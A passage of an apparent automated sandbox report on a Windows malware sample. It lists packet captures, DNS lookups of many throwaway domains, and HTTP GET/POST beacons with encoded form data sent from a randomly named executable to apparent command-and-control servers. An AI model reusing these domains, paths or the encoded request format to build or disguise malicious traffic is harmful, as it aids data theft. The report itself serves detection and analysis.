                                                                                                                    Sep 30, 2024 19:59:40.635924101 CEST80497553.33.130.190192.168.2.5
                                                                                                                    Sep 30, 2024 19:59:40.637645960 CEST80497553.33.130.190192.168.2.5
                                                                                                                    Sep 30, 2024 19:59:42.136872053 CEST4975580192.168.2.53.33.130.190
                                                                                                                    Sep 30, 2024 19:59:42.142107010 CEST80497553.33.130.190192.168.2.5
                                                                                                                    Sep 30, 2024 19:59:42.142174006 CEST4975580192.168.2.53.33.130.190
                                                                                                                    Sep 30, 2024 19:59:43.155874014 CEST4975680192.168.2.53.33.130.190
                                                                                                                    Sep 30, 2024 19:59:43.161050081 CEST80497563.33.130.190192.168.2.5
                                                                                                                    Sep 30, 2024 19:59:43.164237022 CEST4975680192.168.2.53.33.130.190
                                                                                                                    Sep 30, 2024 19:59:43.170650005 CEST4975680192.168.2.53.33.130.190
                                                                                                                    Sep 30, 2024 19:59:43.175813913 CEST80497563.33.130.190192.168.2.5
                                                                                                                    Sep 30, 2024 19:59:43.856339931 CEST80497563.33.130.190192.168.2.5
                                                                                                                    Sep 30, 2024 19:59:43.856518030 CEST80497563.33.130.190192.168.2.5
                                                                                                                    Sep 30, 2024 19:59:43.857944965 CEST4975680192.168.2.53.33.130.190
                                                                                                                    Sep 30, 2024 19:59:43.865928888 CEST4975680192.168.2.53.33.130.190
                                                                                                                    Sep 30, 2024 19:59:43.870822906 CEST80497563.33.130.190192.168.2.5
                                                                                                                    Sep 30, 2024 19:59:48.892321110 CEST4975780192.168.2.5144.34.186.85
                                                                                                                    Sep 30, 2024 19:59:48.897245884 CEST8049757144.34.186.85192.168.2.5
                                                                                                                    Sep 30, 2024 19:59:48.897325993 CEST4975780192.168.2.5144.34.186.85
                                                                                                                    Sep 30, 2024 19:59:48.907529116 CEST4975780192.168.2.5144.34.186.85
                                                                                                                    Sep 30, 2024 19:59:48.912372112 CEST8049757144.34.186.85192.168.2.5
                                                                                                                    Sep 30, 2024 19:59:49.465857983 CEST8049757144.34.186.85192.168.2.5
                                                                                                                    Sep 30, 2024 19:59:49.466027021 CEST8049757144.34.186.85192.168.2.5
                                                                                                                    Sep 30, 2024 19:59:49.473445892 CEST4975780192.168.2.5144.34.186.85
                                                                                                                    Sep 30, 2024 19:59:50.418174028 CEST4975780192.168.2.5144.34.186.85
                                                                                                                    Sep 30, 2024 19:59:51.437987089 CEST4975880192.168.2.5144.34.186.85
                                                                                                                    Sep 30, 2024 19:59:51.442888021 CEST8049758144.34.186.85192.168.2.5
                                                                                                                    Sep 30, 2024 19:59:51.446249962 CEST4975880192.168.2.5144.34.186.85
                                                                                                                    Sep 30, 2024 19:59:51.457986116 CEST4975880192.168.2.5144.34.186.85
                                                                                                                    Sep 30, 2024 19:59:51.462811947 CEST8049758144.34.186.85192.168.2.5
                                                                                                                    Sep 30, 2024 19:59:52.044470072 CEST8049758144.34.186.85192.168.2.5
                                                                                                                    Sep 30, 2024 19:59:52.044529915 CEST8049758144.34.186.85192.168.2.5
                                                                                                                    Sep 30, 2024 19:59:52.046036959 CEST4975880192.168.2.5144.34.186.85
                                                                                                                    Sep 30, 2024 19:59:52.965116978 CEST4975880192.168.2.5144.34.186.85
                                                                                                                    Sep 30, 2024 19:59:53.984014034 CEST4975980192.168.2.5144.34.186.85
                                                                                                                    Sep 30, 2024 19:59:53.989125967 CEST8049759144.34.186.85192.168.2.5
                                                                                                                    Sep 30, 2024 19:59:53.992023945 CEST4975980192.168.2.5144.34.186.85
                                                                                                                    Sep 30, 2024 19:59:54.003180981 CEST4975980192.168.2.5144.34.186.85
                                                                                                                    Sep 30, 2024 19:59:54.008169889 CEST8049759144.34.186.85192.168.2.5
                                                                                                                    Sep 30, 2024 19:59:54.008343935 CEST8049759144.34.186.85192.168.2.5
                                                                                                                    Sep 30, 2024 19:59:54.593997002 CEST8049759144.34.186.85192.168.2.5
                                                                                                                    Sep 30, 2024 19:59:54.594042063 CEST8049759144.34.186.85192.168.2.5
                                                                                                                    Sep 30, 2024 19:59:54.594099998 CEST4975980192.168.2.5144.34.186.85
                                                                                                                    Sep 30, 2024 19:59:55.511925936 CEST4975980192.168.2.5144.34.186.85
                                                                                                                    Sep 30, 2024 19:59:56.532088041 CEST4976080192.168.2.5144.34.186.85
                                                                                                                    Sep 30, 2024 19:59:56.537081957 CEST8049760144.34.186.85192.168.2.5
                                                                                                                    Sep 30, 2024 19:59:56.537173033 CEST4976080192.168.2.5144.34.186.85
                                                                                                                    Sep 30, 2024 19:59:56.545656919 CEST4976080192.168.2.5144.34.186.85
                                                                                                                    Sep 30, 2024 19:59:56.550508022 CEST8049760144.34.186.85192.168.2.5
                                                                                                                    Sep 30, 2024 19:59:57.106379032 CEST8049760144.34.186.85192.168.2.5
                                                                                                                    Sep 30, 2024 19:59:57.106755972 CEST8049760144.34.186.85192.168.2.5
                                                                                                                    Sep 30, 2024 19:59:57.106812000 CEST4976080192.168.2.5144.34.186.85
                                                                                                                    Sep 30, 2024 19:59:57.110150099 CEST4976080192.168.2.5144.34.186.85
                                                                                                                    Sep 30, 2024 19:59:57.115154982 CEST8049760144.34.186.85192.168.2.5
                                                                                                                    Sep 30, 2024 20:00:02.500834942 CEST4976180192.168.2.5136.143.186.12
                                                                                                                    Sep 30, 2024 20:00:02.506732941 CEST8049761136.143.186.12192.168.2.5
                                                                                                                    Sep 30, 2024 20:00:02.506814957 CEST4976180192.168.2.5136.143.186.12
                                                                                                                    Sep 30, 2024 20:00:02.520931959 CEST4976180192.168.2.5136.143.186.12
                                                                                                                    Sep 30, 2024 20:00:02.526813984 CEST8049761136.143.186.12192.168.2.5
                                                                                                                    Sep 30, 2024 20:00:03.140939951 CEST8049761136.143.186.12192.168.2.5
                                                                                                                    Sep 30, 2024 20:00:03.140964031 CEST8049761136.143.186.12192.168.2.5
                                                                                                                    Sep 30, 2024 20:00:03.140974998 CEST8049761136.143.186.12192.168.2.5
                                                                                                                    Sep 30, 2024 20:00:03.141019106 CEST4976180192.168.2.5136.143.186.12
                                                                                                                    Sep 30, 2024 20:00:03.141064882 CEST4976180192.168.2.5136.143.186.12
                                                                                                                    Sep 30, 2024 20:00:04.027584076 CEST4976180192.168.2.5136.143.186.12
                                                                                                                    Sep 30, 2024 20:00:05.048194885 CEST4976280192.168.2.5136.143.186.12
                                                                                                                    Sep 30, 2024 20:00:05.054598093 CEST8049762136.143.186.12192.168.2.5
                                                                                                                    Sep 30, 2024 20:00:05.054732084 CEST4976280192.168.2.5136.143.186.12
                                                                                                                    Sep 30, 2024 20:00:05.067574978 CEST4976280192.168.2.5136.143.186.12
                                                                                                                    Sep 30, 2024 20:00:05.072644949 CEST8049762136.143.186.12192.168.2.5
                                                                                                                    Sep 30, 2024 20:00:05.664117098 CEST8049762136.143.186.12192.168.2.5
                                                                                                                    Sep 30, 2024 20:00:05.664731026 CEST8049762136.143.186.12192.168.2.5
                                                                                                                    Sep 30, 2024 20:00:05.664745092 CEST8049762136.143.186.12192.168.2.5
                                                                                                                    Sep 30, 2024 20:00:05.664800882 CEST4976280192.168.2.5136.143.186.12
                                                                                                                    Sep 30, 2024 20:00:05.664800882 CEST4976280192.168.2.5136.143.186.12
                                                                                                                    Sep 30, 2024 20:00:06.574393988 CEST4976280192.168.2.5136.143.186.12
                                                                                                                    Sep 30, 2024 20:00:07.594048977 CEST4976380192.168.2.5136.143.186.12
                                                                                                                    Sep 30, 2024 20:00:07.600495100 CEST8049763136.143.186.12192.168.2.5
                                                                                                                    Sep 30, 2024 20:00:07.602080107 CEST4976380192.168.2.5136.143.186.12
                                                                                                                    Sep 30, 2024 20:00:07.612725973 CEST4976380192.168.2.5136.143.186.12
                                                                                                                    Sep 30, 2024 20:00:07.618513107 CEST8049763136.143.186.12192.168.2.5
                                                                                                                    Sep 30, 2024 20:00:07.618529081 CEST8049763136.143.186.12192.168.2.5
                                                                                                                    Sep 30, 2024 20:00:08.221538067 CEST8049763136.143.186.12192.168.2.5
                                                                                                                    Sep 30, 2024 20:00:08.221580982 CEST8049763136.143.186.12192.168.2.5
                                                                                                                    Sep 30, 2024 20:00:08.221745968 CEST4976380192.168.2.5136.143.186.12
                                                                                                                    Sep 30, 2024 20:00:09.465003014 CEST4976380192.168.2.5136.143.186.12

                                                                                                                    UDP Packets

                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Sep 30, 2024 19:56:58.741015911 CEST5741453192.168.2.51.1.1.1
                                                                                                                    Sep 30, 2024 19:56:59.064589977 CEST53574141.1.1.1192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:14.719892025 CEST6503253192.168.2.51.1.1.1
                                                                                                                    Sep 30, 2024 19:57:14.847740889 CEST53650321.1.1.1192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:28.312593937 CEST6144053192.168.2.51.1.1.1
                                                                                                                    Sep 30, 2024 19:57:28.690862894 CEST53614401.1.1.1192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:43.048039913 CEST5725353192.168.2.51.1.1.1
                                                                                                                    Sep 30, 2024 19:57:43.444125891 CEST53572531.1.1.1192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:57.657876015 CEST5780453192.168.2.51.1.1.1
                                                                                                                    Sep 30, 2024 19:57:58.668411970 CEST5780453192.168.2.51.1.1.1
                                                                                                                    Sep 30, 2024 19:57:59.668215036 CEST5780453192.168.2.51.1.1.1
                                                                                                                    Sep 30, 2024 19:57:59.743771076 CEST53578041.1.1.1192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:59.743791103 CEST53578041.1.1.1192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:59.743849993 CEST53578041.1.1.1192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:13.863980055 CEST6356653192.168.2.51.1.1.1
                                                                                                                    Sep 30, 2024 19:58:13.999749899 CEST53635661.1.1.1192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:27.284070015 CEST5200753192.168.2.51.1.1.1
                                                                                                                    Sep 30, 2024 19:58:27.370934963 CEST53520071.1.1.1192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:40.803857088 CEST5744853192.168.2.51.1.1.1
                                                                                                                    Sep 30, 2024 19:58:41.144958019 CEST53574481.1.1.1192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:54.283243895 CEST5676953192.168.2.51.1.1.1
                                                                                                                    Sep 30, 2024 19:58:54.310913086 CEST53567691.1.1.1192.168.2.5
                                                                                                                    Sep 30, 2024 19:59:07.440238953 CEST5211153192.168.2.51.1.1.1
                                                                                                                    Sep 30, 2024 19:59:07.454984903 CEST53521111.1.1.1192.168.2.5
                                                                                                                    Sep 30, 2024 19:59:21.128004074 CEST6195353192.168.2.51.1.1.1
                                                                                                                    Sep 30, 2024 19:59:21.755669117 CEST53619531.1.1.1192.168.2.5
                                                                                                                    Sep 30, 2024 19:59:35.380181074 CEST6286253192.168.2.51.1.1.1
                                                                                                                    Sep 30, 2024 19:59:35.524180889 CEST53628621.1.1.1192.168.2.5
                                                                                                                    Sep 30, 2024 19:59:48.874990940 CEST4961053192.168.2.51.1.1.1
                                                                                                                    Sep 30, 2024 19:59:48.889811993 CEST53496101.1.1.1192.168.2.5
                                                                                                                    Sep 30, 2024 20:00:02.124665976 CEST5625753192.168.2.51.1.1.1
                                                                                                                    Sep 30, 2024 20:00:02.497163057 CEST53562571.1.1.1192.168.2.5

                                                                                                                    DNS Queries

                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                    Sep 30, 2024 19:56:58.741015911 CEST192.168.2.51.1.1.10x7383Standard query (0)www.ngmr.xyzA (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 19:57:14.719892025 CEST192.168.2.51.1.1.10x3fcfStandard query (0)www.drivedoge.websiteA (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 19:57:28.312593937 CEST192.168.2.51.1.1.10x9ebeStandard query (0)www.fieldelse.netA (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 19:57:43.048039913 CEST192.168.2.51.1.1.10x7dbcStandard query (0)www.patioprojex.africaA (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 19:57:57.657876015 CEST192.168.2.51.1.1.10x545dStandard query (0)www.animekuid.xyzA (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 19:57:58.668411970 CEST192.168.2.51.1.1.10x545dStandard query (0)www.animekuid.xyzA (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 19:57:59.668215036 CEST192.168.2.51.1.1.10x545dStandard query (0)www.animekuid.xyzA (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 19:58:13.863980055 CEST192.168.2.51.1.1.10x7e42Standard query (0)www.huyven.xyzA (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 19:58:27.284070015 CEST192.168.2.51.1.1.10x8d9eStandard query (0)www.dverkom.storeA (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 19:58:40.803857088 CEST192.168.2.51.1.1.10xa331Standard query (0)www.longfilsalphonse.netA (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 19:58:54.283243895 CEST192.168.2.51.1.1.10x3753Standard query (0)www.bayarcepat19.clickA (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 19:59:07.440238953 CEST192.168.2.51.1.1.10x7c15Standard query (0)www.wdeb18.topA (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 19:59:21.128004074 CEST192.168.2.51.1.1.10x27bStandard query (0)www.galaxyslot88rtp.latA (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 19:59:35.380181074 CEST192.168.2.51.1.1.10xb315Standard query (0)www.dto20.shopA (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 19:59:48.874990940 CEST192.168.2.51.1.1.10xee2dStandard query (0)www.h5hph710am.siteA (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 20:00:02.124665976 CEST192.168.2.51.1.1.10xb73eStandard query (0)www.lanxuanz.techA (IP address)IN (0x0001)false

                                                                                                                    DNS Answers

                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                    Sep 30, 2024 19:56:59.064589977 CEST1.1.1.1192.168.2.50x7383No error (0)www.ngmr.xyz54.67.87.110A (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 19:57:14.847740889 CEST1.1.1.1192.168.2.50x3fcfNo error (0)www.drivedoge.website195.161.68.8A (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 19:57:28.690862894 CEST1.1.1.1192.168.2.50x9ebeNo error (0)www.fieldelse.net18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 19:57:43.444125891 CEST1.1.1.1192.168.2.50x7dbcNo error (0)www.patioprojex.africapatioprojex.africaCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Sep 30, 2024 19:57:43.444125891 CEST1.1.1.1192.168.2.50x7dbcNo error (0)patioprojex.africa197.189.237.186A (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 19:57:59.743771076 CEST1.1.1.1192.168.2.50x545dNo error (0)www.animekuid.xyzanimekuid.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Sep 30, 2024 19:57:59.743771076 CEST1.1.1.1192.168.2.50x545dNo error (0)animekuid.xyz203.175.9.128A (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 19:57:59.743791103 CEST1.1.1.1192.168.2.50x545dNo error (0)www.animekuid.xyzanimekuid.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Sep 30, 2024 19:57:59.743791103 CEST1.1.1.1192.168.2.50x545dNo error (0)animekuid.xyz203.175.9.128A (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 19:57:59.743849993 CEST1.1.1.1192.168.2.50x545dNo error (0)www.animekuid.xyzanimekuid.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Sep 30, 2024 19:57:59.743849993 CEST1.1.1.1192.168.2.50x545dNo error (0)animekuid.xyz203.175.9.128A (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 19:58:13.999749899 CEST1.1.1.1192.168.2.50x7e42No error (0)www.huyven.xyz162.0.238.246A (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 19:58:27.370934963 CEST1.1.1.1192.168.2.50x8d9eNo error (0)www.dverkom.store31.31.196.17A (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 19:58:41.144958019 CEST1.1.1.1192.168.2.50xa331No error (0)www.longfilsalphonse.net52.223.13.41A (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 19:58:54.310913086 CEST1.1.1.1192.168.2.50x3753No error (0)www.bayarcepat19.click188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 19:58:54.310913086 CEST1.1.1.1192.168.2.50x3753No error (0)www.bayarcepat19.click188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 19:59:07.454984903 CEST1.1.1.1192.168.2.50x7c15No error (0)www.wdeb18.topwdeb18.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Sep 30, 2024 19:59:07.454984903 CEST1.1.1.1192.168.2.50x7c15No error (0)wdeb18.top206.119.82.147A (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 19:59:21.755669117 CEST1.1.1.1192.168.2.50x27bNo error (0)www.galaxyslot88rtp.latgalaxyslot88rtp.latCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Sep 30, 2024 19:59:21.755669117 CEST1.1.1.1192.168.2.50x27bNo error (0)galaxyslot88rtp.lat46.17.172.49A (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 19:59:35.524180889 CEST1.1.1.1192.168.2.50xb315No error (0)www.dto20.shopdto20.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Sep 30, 2024 19:59:35.524180889 CEST1.1.1.1192.168.2.50xb315No error (0)dto20.shop3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 19:59:35.524180889 CEST1.1.1.1192.168.2.50xb315No error (0)dto20.shop15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 19:59:48.889811993 CEST1.1.1.1192.168.2.50xee2dNo error (0)www.h5hph710am.siteh5hph710am.siteCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Sep 30, 2024 19:59:48.889811993 CEST1.1.1.1192.168.2.50xee2dNo error (0)h5hph710am.site144.34.186.85A (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 20:00:02.497163057 CEST1.1.1.1192.168.2.50xb73eNo error (0)www.lanxuanz.techzhs.zohosites.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Sep 30, 2024 20:00:02.497163057 CEST1.1.1.1192.168.2.50xb73eNo error (0)zhs.zohosites.com136.143.186.12A (IP address)IN (0x0001)false

                                                                                                                    HTTP Request Dependency Graph

                                                                                                                    • www.ngmr.xyz
                                                                                                                    • www.drivedoge.website
                                                                                                                    • www.fieldelse.net
                                                                                                                    • www.patioprojex.africa
                                                                                                                    • www.animekuid.xyz
                                                                                                                    • www.huyven.xyz
                                                                                                                    • www.dverkom.store
                                                                                                                    • www.longfilsalphonse.net
                                                                                                                    • www.bayarcepat19.click
                                                                                                                    • www.wdeb18.top
                                                                                                                    • www.galaxyslot88rtp.lat
                                                                                                                    • www.dto20.shop
                                                                                                                    • www.h5hph710am.site
                                                                                                                    • www.lanxuanz.tech

                                                                                                                    HTTP Packets

                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    0192.168.2.54971254.67.87.110804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:56:59.084404945 CEST469OUTGET /fu87/?2Zv0=qtmpl4wh&FbuX5DnP=qh6vHM1wnebxXDDw2+FKNmF+EgGb6h3lhyJTJqyJk9tXxJTOz685U0RnFTuJgXE78BkDdexAIHcYDkJjTquRDOTOtPaRUKFiNfEDt1vQqQEhgT+IhmyUGPK3HCAi1oMdiQ== HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Host: www.ngmr.xyz
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Sep 30, 2024 19:56:59.678790092 CEST550INHTTP/1.1 404 Not Found
                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                    Content-Length: 282
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Date: Mon, 30 Sep 2024 18:19:39 GMT
                                                                                                                    X-Varnish: 1107661128
                                                                                                                    Age: 0
                                                                                                                    Via: 1.1 varnish
                                                                                                                    Connection: close
                                                                                                                    X-Varnish-Cache: MISS
                                                                                                                    Server: C2M Server v1.02
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 75 38 37 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fu87/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    1192.168.2.549713195.161.68.8804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:57:14.864094019 CEST746OUTPOST /czka/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 209
                                                                                                                    Host: www.drivedoge.website
                                                                                                                    Origin: http://www.drivedoge.website
                                                                                                                    Referer: http://www.drivedoge.website/czka/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Raw: 46 62 75 58 35 44 6e 50 3d 54 65 57 66 36 66 70 54 6b 45 66 66 69 4a 67 35 37 58 35 6d 75 65 51 43 6f 58 45 6e 58 61 78 37 6f 33 70 69 62 64 52 6e 33 41 64 68 52 2b 58 62 41 64 41 6a 79 37 75 4b 6f 39 2b 6f 71 6b 37 33 2f 38 63 76 42 34 78 4c 6c 66 65 2b 68 6f 4e 45 72 6d 72 53 70 35 66 61 44 64 34 2f 45 4d 5a 49 66 6a 52 69 46 4e 52 67 78 44 75 78 73 44 33 73 48 50 36 68 34 75 44 43 55 41 4b 6d 68 37 6e 54 58 2f 58 68 69 67 6f 4f 52 67 52 59 66 79 65 49 55 54 54 62 63 6d 2f 4b 32 4e 42 41 2f 4b 6c 44 52 67 78 66 36 64 6d 74 34 37 30 68 42 38 4f 42 78 7a 66 36 6d 72 2b 35 35 35 4c 6d 61 4e 43 70 4b 50 72 78 77 4c 73 3d
                                                                                                                    Data Ascii: FbuX5DnP=TeWf6fpTkEffiJg57X5mueQCoXEnXax7o3pibdRn3AdhR+XbAdAjy7uKo9+oqk73/8cvB4xLlfe+hoNErmrSp5faDd4/EMZIfjRiFNRgxDuxsD3sHP6h4uDCUAKmh7nTX/XhigoORgRYfyeIUTTbcm/K2NBA/KlDRgxf6dmt470hB8OBxzf6mr+555LmaNCpKPrxwLs=
                                                                                                                    Sep 30, 2024 19:57:15.566796064 CEST778INHTTP/1.1 404 Not Found
                                                                                                                    Date: Mon, 30 Sep 2024 17:57:15 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 634
                                                                                                                    Connection: close
                                                                                                                    Server: Apache
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 70 61 67 65 3d 22 34 30 34 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 68 31 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 68 31 3e 3c 70 3e d0 92 d0 be d0 b7 d0 bc d0 be d0 b6 d0 bd d0 be 2c 20 d0 b2 d1 8b 20 d0 be d1 88 d0 b8 d0 b1 d0 bb d0 b8 d1 81 d1 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    2192.168.2.549714195.161.68.8804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:57:17.477968931 CEST766OUTPOST /czka/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 229
                                                                                                                    Host: www.drivedoge.website
                                                                                                                    Origin: http://www.drivedoge.website
                                                                                                                    Referer: http://www.drivedoge.website/czka/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
